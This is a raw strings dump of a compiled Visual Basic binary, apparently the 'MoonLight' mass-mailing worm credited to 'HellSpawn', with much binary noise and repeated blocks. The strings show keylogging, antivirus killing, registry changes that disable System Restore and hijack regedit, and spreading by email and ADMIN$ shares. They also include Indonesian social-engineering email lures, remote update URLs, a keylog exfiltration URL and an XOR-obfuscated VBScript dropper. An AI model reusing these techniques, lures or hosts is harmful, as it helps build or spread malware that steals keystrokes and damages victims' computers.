[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
TmrTungguconect
TmrDos
Timer3
Timer2
VB5!*
FILE FOLDER
NewMoonlight
6d":hNc
global
Utilities
ScanEmail
FrmMain
basRegistry
modInet
newSmtp
basService
keylog
ModSmtpEngine
Modzip
ModNetwork
ModMoonUpdate
Modmidi
Modhtt
NewMoonlight
shell32.dll
ShellExecuteA
kernel32
GetWindowsDirectoryA
GetSystemDirectoryA
user32.dll
EnumWindows
user32
EnableWindow
GetParent
ShowWindow
GetWindowTextA
GetClassNameA
SendMessageA
FindWindowA
WritePrivateProfileStringA
GetPrivateProfileStringA
+3q"=h
Da~:W~D9
$!*O3f
TmrKeyLog
+3qC:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Timer2
TxtCaption
Timer3
TmrDos
TmrTungguconect
wininet.dll
InternetCheckConnectionA
GetDriveTypeA
instal
CopyWoRm
setMyRegister
KIllallVirri
CopyYourUfd
StartMailWorm
SelamatkanMsVb
EndTKMnUW
CreateMutex
kirimbo
taroocx
dRopingAnyFiles
shellbi
buatOtomatis
FindFirstFileA
FindNextFileA
FindClose
VBA6.DLL
__vbaAryDestruct
__vbaPut4
__vbaPutOwner3
__vbaFileClose
__vbaGetOwner3
__vbaFileOpen
__vbaRedim
__vbaExitProc
__vbaVarMod
__vbaLenBstr
__vbaOnError
__vbaVarForNext
__vbaVarXor
__vbaI4Var
__vbaLenVar
__vbaVarForInit
__vbaVarMove
__vbaStrVarCopy
__vbaVarVargNofree
__vbaVarTstNe
__vbaR8IntI2
__vbaStrVarVal
__vbaStrLike
__vbaObjSet
__vbaFreeObj
__vbaVarDup
__vbaHresultCheckObj
__vbaNew2
__vbaVarTstEq
__vbaFixstrConstruct
__vbaFreeVar
__vbaFreeStrList
__vbaStrToUnicode
__vbaSetSystemError
__vbaStrI4
__vbaStrCat
__vbaStrToAnsi
__vbaFreeVarList
__vbaVarCat
__vbaStrVarMove
__vbaStrCmp
__vbaUbound
__vbaFreeStr
__vbaStrMove
__vbaStrCopy
advapi32.dll
OpenSCManagerA
CreateServiceA
DeleteService
CloseServiceHandle
WNetOpenEnumA
OpenServiceA
ws2_32.dll
WSAAsyncSelect
listen
accept
icmp.dll
IcmpCreateFile
IcmpCloseHandle
IcmpSendEcho
WSAStartup
gethostbyname
WSACleanup
RtlMoveMemory
wsock32.dll
gethostbyaddr
inet_addr
ioctlsocket
socket
connect
closesocket
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetOpenA
InternetConnectA
__vbaGosubFree
__vbaGosub
__vbaVarIndexLoad
__vbaInStrVar
__vbaRefVarAry
__vbaErase
__vbaVarCopy
__vbaVarZero
moonlight.dll
ZpInit
ZpSetOptions
ZpGetOptions
ZpArchive
__vbaVarTstGt
__vbaVarCmpNe
__vbaVarCmpEq
__vbaVarOr
__vbaBoolVarNull
__vbaVarSub
__vbaVarAdd
__vbaObjVar
__vbaLateMemCall
__vbaVarLateMemCallLd
__vbaVargVar
__vbaLateMemCallLd
__vbaRecAnsiToUni
__vbaVarSetVar
__vbaInStr
__vbaVarSetObjAddref
__vbaLsetFixstr
__vbaStrFixstr
__vbaRecUniToAnsi
shell32
SHGetSpecialFolderLocation
SHGetPathFromIDListA
mpr.dll
WNetEnumResourceA
WNetCloseEnum
lstrlenA
lstrcpyA
WNetAddConnection2A
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
winmm.dll
mciExecute
mciSendStringA
GetAsyncKeyState
GetKeyState
Kernel32.dll
RegisterServiceProcess
__vbaStrI2
__vbaVar2Vec
__vbaAryMove
__vbaPrintFile
__vbaNameFile
__vbaObjSetAddref
__vbaAryUnlock
__vbaVarIndexLoadRefLock
__vbaVarAnd
__vbaEnd
__vbaFreeObjList
__vbaI4ErrVar
__vbaI2Var
__vbaR8Str
__vbaGet4
__vbaPowerR8
__vbaVarMul
__vbaAryConstruct2
__vbaStrUI1
__vbaAryLock
__vbaNew
__vbaVarLateMemSt
__vbaGet3
__vbaFpI4
__vbaRecDestructAnsi
__vbaUI1Var
__vbaRecDestruct
__vbaPut3
buffer
namafile
drive2
]]]]]]xhXH8(
EMPUQRPxhPQPXRP
HP8QRP(PQP
Q(R8PHQXRhPxQERMPUQRj
UPh$a@
EMPUQERMPUQERMPQj
UERMPUQERMPUQERPj
Q(R8PHQXRhPxQERMPUQRj
jXh`a@
URhta@
EMPUQERPj
MUQR~
EMPUQERMPQj
EM3PQuu
4SVWeE
MfE_^d
PSVWeE
E3SPuu
UQREhd@
EEEEEtdD4$
L<DTPD4
R$PUQR
ETRPUQR
T\MPUQR
dtPUQRj
tSVWeE
uuuuuuuU
PMQURPEPMQPUREPPMQURP
EPMQUREPMQj
UREPMQUREPj
USVWeE@
URhpd@
EPMQEE
EPhpd@
MQURofEfEfEj
,SVWeE
UPQERMPQh0C
uuuu|l\L<,
|lhXH8(
,<QLR\PlQ|RMPUQERMPUQRj
|uf|f9U
f;t%X0C
l|QRPQRPQRP
R,P<QLR\PlQ|RMPUQERMPUQRj
}}}}}tdTD4$
MUQERPj
uuuutdTD40
MQR|0ttH
EMPUQERPj
4DQTRdPtQERMPUQERPj
CSVWeE
URhxs@
SVWeEP
}}}}}|lE
j`h`a@
SVWeE`
}}}}}tdTD4$
MUQERPj
SVWeEp
MPQuuu
uuuuuutplhEu@
f;t3xh
ERPEu@
UQREu@
EMPUQR$
MxQERPE v@
hhtElPQpRtPUQRlp
LQ]]]]
plhd`\HT
tPQhd@
hlQpRPj
tQRhd@
tQRhd@
hlPpQRj
tQRhd@
PEPh[@
tRPhd@
DlpRPj
dPh|i@
d#hRlPpQRj
\UQER`PQ3
\`RhPlQpRPj
UQERMPHQhRPfhlQpRPj
t@QRhd@
@tQRhd@
dRh|i@
#hPlQpRPj
\ERMP`QR0
\`PhQlRpPQj
ERMPUQHRhPQRhlRpPQj
6\`QdRhPlQpRPj
=-SVWeE
P\PxQR
QRPQRj
uuuuu|xhXHD@0
PRPUQR
Q R0PQj
PUR0PQ
EEMP QR
MPQ0RP
RhP0QR
Pl|PUQR
Q R0PQj
l|PUQR
f;tgh0QR
0RP VQ
f9toh0QR
f9t9hP0QR
f9t9hR0PQ
Q R0PQj
P Q0RPj
f9t60C
0QRf50C
f;t*U1C
L@DPQj
Q R0PQj
l|RPQRj
fEPMQj
UREPMQ
P`R0P Q
PQPR@P
PPpQ`R
PpR@P0Q
fpPQRPQR
R PPQR`PpQRPQRP
Q0R`P@QPRpPMQUREPMQUR@PpQPR`PQRPQRP QPR0P@Q`RPQRPQ
Q R@Pj7
R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`RpPQRPQRPQR
Q R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpREPMQUREPMQURjL
}SVWeEP
fpUREPMQj
5UREPMQj
3UREPMQj
UREPMQURj
]]]]]|l\L<,
TSVWeE
E3PMuuu
MUVRME
MPQUVR
]]]]]|l\L<,
|xtplhd`\XTP
jPh`a@
E]EEPE
jXh`a@
P]PMh`@
MPEPPMh
MPUQERMPUQERMPQj
jhh`a@
Mp4VQPg(P
MPUQRj
MPUQRj
jXh`a@
EUERPuE
|ERMPUQRj
UER3MPQ
R,P<QLR\PlQ|RMPUQERPj
jXh`a@
EEMPQE
UQRPEMPQPUhX@
RPEh`@
UQERMPQj
MPUQRPEhd@
PPMh`@
ERMPUQRj
MPUQERMPUQERMPUQRj
R,P<QLR\PlQ|RMPUQERPj
=SVWeE
}#j|h`a@
}#jPh`a@
}#jXh`a@
MQUREPj
Q0R@PPQ`Rj
@QPR`Pj
@QPR`Pj
Q8Rhta@
Q8Rh @
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
PR0P Q
P@Q0R P
fMQUREPMQUREPj
pQtRxP|QUREPj
P0Q@RPPQRPQR
R0PPQ@R`Pj
MQUREPMQUREPj
pQtRxP|QUREPj
pQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`Rj
MQURVwEPMQj
UREPMQj
EPMQURj
MQUREPj
UREPMQj
EPMQURj
rUREPMQURj
MQUREPj
pEPMQURj
MQUREPj
UREPMQj
EPMQURj
MQUREPMQj
EPMQURj
3EPMQUREPj
MQUREPj
}SVWeE
EPMQURj
Q4RPMQtR
EPMQUREPMQUREPj
4QDRTPdQtREPMQURj
PREPMQ
EPMQUREPj
$QTR4PDQdREPtQUREPj
$R4PDQTRdPtQUREPMQj
PMQh01C
4QDRTPdQtREPMQURj
PMQh\@
PMQhx@
PMQh`@
REPh`@
QURh`@
EPMQUREPMQj
UREPMQj
EPMQUREPMQj
UREPMQj
EPMQURj
iMQUREPMQUREPMQj
$R4PDQTRdPtQUREPMQj
R$P4QDRTPdQtREPj
fEfMf;
fEfMf;
EPMQUR
$P4QDRTPdQtRPQRPQRPQ
P$Q4RDPTQdRtPMQj
]SVWeE
MQtRdP,Q<REP
EPMQUR
`EPTQXR\P`QURc^M
,P<QUR
SVWeEX
URQ\E}
UREP8=MQURj
xPMQURj
EPMQ;UREPMQj
xREPMQj
PPPTQ3P
PHRLP3P
P@QDRd3P
EPMQUREPMQUREPMQUREPj
,MQURj
MQUREPMQUREPMQUREPMQj
,xREPMQj
EPMQUR
fMQUREPj
}#jXh`a@
MQhta@
UREPMQURj
UR$PMQ
URPQRPMQxQUREPj
}#jXh`a@
MQhta@
UREPMQURj
EPMQUR
dPtQTR
PTPQDR
fTQdRtPMQUREPj
fzRu)E
}#jXh`a@
EPhta@
MQUREPj
EPMQUR
fMQUREPj
BTu E
[MQURj
4PDQTRdPtQUREPMQURj
]]]]]p`PLk
jXh`a@
URhta@
EMPUQERPj
jXh`a@
EPhta@
3Mf9LUQR
PERMPUQERPj
pMPUQERMPUQRj
-}SVWeE
{SVWeE
SVWeEH
EMPQ5M
SVWeEX
jXh`a@
URhta@
EMPUQERPj
MUQERMPUQRj
vSVWeEh
}#j\h}@
}#jXh`a@
MQUREPMQj
tPMQ`W
}#j\h}@
UREPMQUREPj
TSVWeE
MPhls@
EMPQ/UERMPUQERMPQj
UERMPUQERMPQj
\SVWeE
j8h@a@
ERPEP@
j8h@a@
HSVWeE
QPUh`@
MPQPUh
ERMPUQRj
MjXha@
RPEh`@
PUQRPEh
MPUQERPj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
MPQPUh
UQERMPUQRj
MPUQERMPQj
-hSVWeE
EPMQURj
EPMQURj
UREPMQj
EPMQURj
,SVWeE0
3MEEEE
MEQRPPVC5p
SVWeE@
MEPUQRu
MfE_^d
|SVWeEP
3Muuuu
uuuuuuuu
EUPQRuuPE
9uu?UME`@
UEPMVQVERP
MUQMERPVUQRE
UMQERPu
UMPQVERP
@@@@@@
@@@@@@@@
@@@@@@
@@@@@@@
@@@@@@
AAAAAAA
BBBBBBB
BBBBBBB
BBBBBBBBB
BBBBBBB
BBBBBBB
BBBBBB
BBBBBBBB
BBBBBBBB
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
@OLDER.exe
@OLDER.exe
C*\AD:\DataHellSpawn\WARING_VIRII_LABORATORY\Virus Ku\Moonlight Update Baru\Project1.vbp
winlogon.exe
sophos
mcafee
norton
security
d`j{fzfo}
z|yf{}
DffgDh`e
pf|{z`}l
pf|{mfdh`g
norman
vaksin
novell
Gf{dhg)GCll
Gf{dhg)Shgmh
GetFile
\MYpIC.zip
GET / HTTP/1.1
Host:
Friendster
hotmail
\64enc.en
OpenAsTextStream
ReadAll
ReadLine
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-._
RealPlayer13-5GOLD.exe
Icon Cool-Editor 3.4.30315.exe
CheatEngine52.exe
framework-4.4.exe
Vista Transformation Pack 4.0.exe
Pack_Vista_Inspirat_1.6.exe
DeepUnfreezerU1.6.exe
Pack_Longhorn_Inspirat_1.6_code32547.exe
TeamViewer_Setup.exe
Licence.exe
Pictures.exe
Secret.exe
Documents.exe
Vivid.exe
update.exe
XXX.exe
cool.exe
vitae.exe
error.exe
@ght Upda
explore
regedit
\cypreg.dll
service.exe
smss.exe
system
Uzpz}lh{'mee
\startup
Efjhe)Zl}}`gnzUHyye`jh}`fg)Mh}h
Zfo}~h{lUD`j{fzfo}Uylh{eUk`hgn
Zfo}~h{lUD`j{fzfo}UYlh{eUYh}a
.{645FF040-5081-101B-9F08-00AA002F954E}
`jl'lql
Uzdzz'lql
lsass.exe
system.exe
\regedit.exe
\winlogon.exe
\system.exe
\lsass.exe
U{lnlm`}'jdm
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fg
ULqyef{l{UJhk`gl}Z}h}l
FullPath
ZFO]^H[LUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gefnfg
explorer.exe,
Zfo}~h{lUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gmf~z
\Explorer\Advanced
HideFileExt
Hidden
ShowSuperHidden
scrfile
File Folder
exefile
SOFTWARE\Classes\exefile
ZPZ]LDUJ|{{lg}Jfg}{feZl}UZl{
`jlzUZah{lmHjjlzz
ULqyef{l{UHm
hgjlmUOfeml{UZ|yl{A`mmlg
\gjaljblm_he|l
msconfig.exe
debugger
ZFO]^H[LUYfe`j`lzUD`j{fzfo}U^`gmf~z)G]UZpz}ld[lz}f{l
DisableConfig
DisableSR
ZPZ]LDUJfg}{feZl}998UJfg}{feUZholKff}
He}l{gh}lZalee
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\notepad.exe
regedit.exe
rstrui.exe
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fgU{|g
drv_st_key
gf{dhgVshgmh
gf{dhg)shgmh
^`ghdy
^`g\ymh}lZ|yl{
J|lQ==Vz}`eVal{l
H|}fZ|yl{
SMA_nya_Artika
Putri_Indonesia
BabelPath
Alumni Smansa
ViriSetup
SMAN1_Pangkalpinang
Putri_Bangka
SysYuni
SysDiaz
SysRia
DllHost
SaTRio ADie X
Tok-Cirrhatus
AllMyBallance
MomentEverComes
TryingToSpeak
YourUnintended
YourUnintendes
lexplorer
dkernel
Bron-Spizaetus
ADie suka kamu
winfix
templog
service
Grogotix
\windows*
\ShellNew\*.exe
\*.exe
\*.vbs
\MyHeart.exe
\KesenjanganSosial.exe
\FirstLove.exe*
\eksplorasi*
\CintaButa*
\*.pif
\Romantic*
Zj{`y}`gn'O`elZpz}ldFkclj}
\msvbvm60.dll
Uzpz}ldUdz
d?9'mee
UDZ^@GZJB'fjq
ThunderRT6FormDC
TForm1
\MooNlight.R.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Dev!l.Inc|
I-WorM.LunaLIGHT.d Aliase W32/MoonLight.R@mm
CopyRight @ HellSpawn a.K.a B4bb1CooL
Once In The Blue Moon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.bsi.ac.id
http://www.google.com/
http://
memencool.netfast.org
/testms.php?mod=save&bkd=0&klog=
\moonlight.dll
\onceinabluemoon.mid
desktop.ini
Elitta.htt
moonlight.exe
</head>
############
Windows Sockets Version
is not supported by Windows
Sockets For 32 bit Windows environments.
This application requires a minimum of
supported sockets.
MAIL FROM: <
RCPT TO: <
----_=_NextPart_000_
00000000
From: <
Subject:
Date:
yyyy hh:nn:ss
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=
Content-Type:
text/plain;
charset=
windows-1255
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=
{backspace}
{shift}
{ctrl}
{pause}
{home}
{left}
{right}
{down}
{insert}
{Delete}
Visible
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{Pagedown}
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{U
Default Mail Account
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{UHjjf|g}zU
SMTP Server
SMTP Email Address
hackersmail.com
hotmail.com
gmail.com
msn.com
yahoo.com.sg
Lovemail.com
mail1.
relay.
D`phk`
ghm`gl
}a`zo`el
gllm)pf|
Tolong Aku..
Tolong
Nadine
Aku Mencari Wanita yang aku Cintai
dan cara menggunakan email mass
ini adalah cara terakhirku ,di lampiran ini terdapat
foto dan data Wanita tsb Thank's
NB:Mohon di teruskan kesahabat anda
aku mahasiswa BSI Margonda smt 4
yah aku sedang membutuhkan pekerjaan
oh ya aku tahu anda dr milis ilmu komputer
di lampiran ini terdapat curriculum vittae dan foto saya
hey Indonesian porn
Agnes Monica pic's
Fucking With Me :D
sisilia
please read again what i have written to you
Hot ...
miss Indonesian
Cek This
Japannes Porn
Firmansyah
Lanelitta
Fransisca
Claudia
Fransiska
Cicilia
CoolMan
Valentina
sasuke
HellSpawn
JuwitaNingrum
Natalia
telkom
astaga
warung
Enter the comment
alias mysound
Administrator
\ADMIN$
memencool.netfast.org/update.txt
siap.host.sk/update.txt
yosef.netfast.org/update.txt
friendster.netfast.org/Update.txt
\untk.com
play mySound
<!-- Code By HellSPawN a.k.a B4BB!cool -->
<script language=vbscript>
5a}de75alhm75&alhm75kfmp)z}pel4+dh{n`g3)9+)zj{fee4gf75fkclj})`m4O`el
E`z})kf{ml{49)}hk`gmlq48)jehzz`m4+jez`m381;9OLM9$=>:L$88M9$H0?J$99J9=OM
>9<H;+)z}pel4+~`m}a3)899,2)al`na}3)899,+)}hk@gmlq4$875&fkclj}75&kfmp75F
KCLJ])@M4+[\G@]+)^@M]A49)AL@NA]49))]PYL4+hyye`jh}`fg&q$felfkclj}+)JFMLK
HZL4+dffge`na}'lql*
l{z`fg48%8%8%8+75YH[HD)GHDL4+V_l{z`fg+)_HE\L4+?<<:?
+75&FKCLJ]7
dePok = 12321
For i = 1 To Len(a)
Hacker = Asc(Mid(a, i, 1))
crbyte = Chr(Hacker Xor (dePok Mod 12))
xx = xx & crbyte
document.Write xx
</script>
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://moon\Elitta.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
dEvil.Inc
FileDescription
LunALight Zipper
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
VarFileInfo
Translation
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
Comments
Microsoft Corporation
CompanyName
File Folder
ProductName
FileVersion
ProductVersion
InternalName
FILE FOLDER
OriginalFilename
FILE FOLDER.exe
EIDGZX
@@@@@@
@@@@@@@@
@@@@@@
@@@@@@@
@@@@@@
AAAAAAA
BBBBBBB
BBBBBBB
BBBBBBBBB
BBBBBBB
BBBBBBB
BBBBBB
BBBBBBBB
BBBBBBBB
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
@OLDER.exe
@OLDER.exe
C*\AD:\DataHellSpawn\WARING_VIRII_LABORATORY\Virus Ku\Moonlight Update Baru\Project1.vbp
winlogon.exe
sophos
mcafee
norton
security
d`j{fzfo}
z|yf{}
DffgDh`e
pf|{z`}l
pf|{mfdh`g
norman
vaksin
novell
Gf{dhg)GCll
Gf{dhg)Shgmh
GetFile
\MYpIC.zip
GET / HTTP/1.1
Host:
Friendster
hotmail
\64enc.en
OpenAsTextStream
ReadAll
ReadLine
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-._
RealPlayer13-5GOLD.exe
Icon Cool-Editor 3.4.30315.exe
CheatEngine52.exe
framework-4.4.exe
Vista Transformation Pack 4.0.exe
Pack_Vista_Inspirat_1.6.exe
DeepUnfreezerU1.6.exe
Pack_Longhorn_Inspirat_1.6_code32547.exe
TeamViewer_Setup.exe
Licence.exe
Pictures.exe
Secret.exe
Documents.exe
Vivid.exe
update.exe
XXX.exe
cool.exe
vitae.exe
error.exe
@ght Upda
explore
regedit
\cypreg.dll
service.exe
smss.exe
system
Uzpz}lh{'mee
\startup
Efjhe)Zl}}`gnzUHyye`jh}`fg)Mh}h
Zfo}~h{lUD`j{fzfo}Uylh{eUk`hgn
Zfo}~h{lUD`j{fzfo}UYlh{eUYh}a
.{645FF040-5081-101B-9F08-00AA002F954E}
`jl'lql
Uzdzz'lql
lsass.exe
system.exe
\regedit.exe
\winlogon.exe
\system.exe
\lsass.exe
U{lnlm`}'jdm
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fg
ULqyef{l{UJhk`gl}Z}h}l
FullPath
ZFO]^H[LUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gefnfg
explorer.exe,
Zfo}~h{lUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gmf~z
\Explorer\Advanced
HideFileExt
Hidden
ShowSuperHidden
scrfile
File Folder
exefile
SOFTWARE\Classes\exefile
ZPZ]LDUJ|{{lg}Jfg}{feZl}UZl{
`jlzUZah{lmHjjlzz
ULqyef{l{UHm
hgjlmUOfeml{UZ|yl{A`mmlg
\gjaljblm_he|l
msconfig.exe
debugger
ZFO]^H[LUYfe`j`lzUD`j{fzfo}U^`gmf~z)G]UZpz}ld[lz}f{l
DisableConfig
DisableSR
ZPZ]LDUJfg}{feZl}998UJfg}{feUZholKff}
He}l{gh}lZalee
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\notepad.exe
regedit.exe
rstrui.exe
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fgU{|g
drv_st_key
gf{dhgVshgmh
gf{dhg)shgmh
^`ghdy
^`g\ymh}lZ|yl{
J|lQ==Vz}`eVal{l
H|}fZ|yl{
SMA_nya_Artika
Putri_Indonesia
BabelPath
Alumni Smansa
ViriSetup
SMAN1_Pangkalpinang
Putri_Bangka
SysYuni
SysDiaz
SysRia
DllHost
SaTRio ADie X
Tok-Cirrhatus
AllMyBallance
MomentEverComes
TryingToSpeak
YourUnintended
YourUnintendes
lexplorer
dkernel
Bron-Spizaetus
ADie suka kamu
winfix
templog
service
Grogotix
\windows*
\ShellNew\*.exe
\*.exe
\*.vbs
\MyHeart.exe
\KesenjanganSosial.exe
\FirstLove.exe*
\eksplorasi*
\CintaButa*
\*.pif
\Romantic*
Zj{`y}`gn'O`elZpz}ldFkclj}
\msvbvm60.dll
Uzpz}ldUdz
d?9'mee
UDZ^@GZJB'fjq
ThunderRT6FormDC
TForm1
\MooNlight.R.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Dev!l.Inc|
I-WorM.LunaLIGHT.d Aliase W32/MoonLight.R@mm
CopyRight @ HellSpawn a.K.a B4bb1CooL
Once In The Blue Moon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.bsi.ac.id
http://www.google.com/
http://
memencool.netfast.org
/testms.php?mod=save&bkd=0&klog=
\moonlight.dll
\onceinabluemoon.mid
desktop.ini
Elitta.htt
moonlight.exe
</head>
############
Windows Sockets Version
is not supported by Windows
Sockets For 32 bit Windows environments.
This application requires a minimum of
supported sockets.
MAIL FROM: <
RCPT TO: <
----_=_NextPart_000_
00000000
From: <
Subject:
Date:
yyyy hh:nn:ss
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=
Content-Type:
text/plain;
charset=
windows-1255
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=
{backspace}
{shift}
{ctrl}
{pause}
{home}
{left}
{right}
{down}
{insert}
{Delete}
Visible
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{Pagedown}
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{U
Default Mail Account
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{UHjjf|g}zU
SMTP Server
SMTP Email Address
hackersmail.com
hotmail.com
gmail.com
msn.com
yahoo.com.sg
Lovemail.com
mail1.
relay.
D`phk`
ghm`gl
}a`zo`el
gllm)pf|
Tolong Aku..
Tolong
Nadine
Aku Mencari Wanita yang aku Cintai
dan cara menggunakan email mass
ini adalah cara terakhirku ,di lampiran ini terdapat
foto dan data Wanita tsb Thank's
NB:Mohon di teruskan kesahabat anda
aku mahasiswa BSI Margonda smt 4
yah aku sedang membutuhkan pekerjaan
oh ya aku tahu anda dr milis ilmu komputer
di lampiran ini terdapat curriculum vittae dan foto saya
hey Indonesian porn
Agnes Monica pic's
Fucking With Me :D
sisilia
please read again what i have written to you
Hot ...
miss Indonesian
Cek This
Japannes Porn
Firmansyah
Lanelitta
Fransisca
Claudia
Fransiska
Cicilia
CoolMan
Valentina
sasuke
HellSpawn
JuwitaNingrum
Natalia
telkom
astaga
warung
Enter the comment
alias mysound
Administrator
\ADMIN$
memencool.netfast.org/update.txt
siap.host.sk/update.txt
yosef.netfast.org/update.txt
friendster.netfast.org/Update.txt
\untk.com
play mySound
<!-- Code By HellSPawN a.k.a B4BB!cool -->
<script language=vbscript>
5a}de75alhm75&alhm75kfmp)z}pel4+dh{n`g3)9+)zj{fee4gf75fkclj})`m4O`el
E`z})kf{ml{49)}hk`gmlq48)jehzz`m4+jez`m381;9OLM9$=>:L$88M9$H0?J$99J9=OM
>9<H;+)z}pel4+~`m}a3)899,2)al`na}3)899,+)}hk@gmlq4$875&fkclj}75&kfmp75F
KCLJ])@M4+[\G@]+)^@M]A49)AL@NA]49))]PYL4+hyye`jh}`fg&q$felfkclj}+)JFMLK
HZL4+dffge`na}'lql*
l{z`fg48%8%8%8+75YH[HD)GHDL4+V_l{z`fg+)_HE\L4+?<<:?
+75&FKCLJ]7
dePok = 12321
For i = 1 To Len(a)
Hacker = Asc(Mid(a, i, 1))
crbyte = Chr(Hacker Xor (dePok Mod 12))
xx = xx & crbyte
document.Write xx
</script>
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://moon\Elitta.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
dEvil.Inc
FileDescription
LunALight Zipper
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
VarFileInfo
Translation
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
Comments
Microsoft Corporation
CompanyName
File Folder
ProductName
FileVersion
ProductVersion
InternalName
FILE FOLDER
OriginalFilename
FILE FOLDER.exe
EIDGZJ
@@@@@@
@@@@@@@@
@@@@@@
@@@@@@@
@@@@@@
AAAAAAA
BBBBBBB
BBBBBBB
BBBBBBBBB
BBBBBBB
BBBBBBB
BBBBBB
BBBBBBBB
BBBBBBBB
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
@OLDER.exe
@OLDER.exe
C*\AD:\DataHellSpawn\WARING_VIRII_LABORATORY\Virus Ku\Moonlight Update Baru\Project1.vbp
winlogon.exe
sophos
mcafee
norton
security
d`j{fzfo}
z|yf{}
DffgDh`e
pf|{z`}l
pf|{mfdh`g
norman
vaksin
novell
Gf{dhg)GCll
Gf{dhg)Shgmh
GetFile
\MYpIC.zip
GET / HTTP/1.1
Host:
Friendster
hotmail
\64enc.en
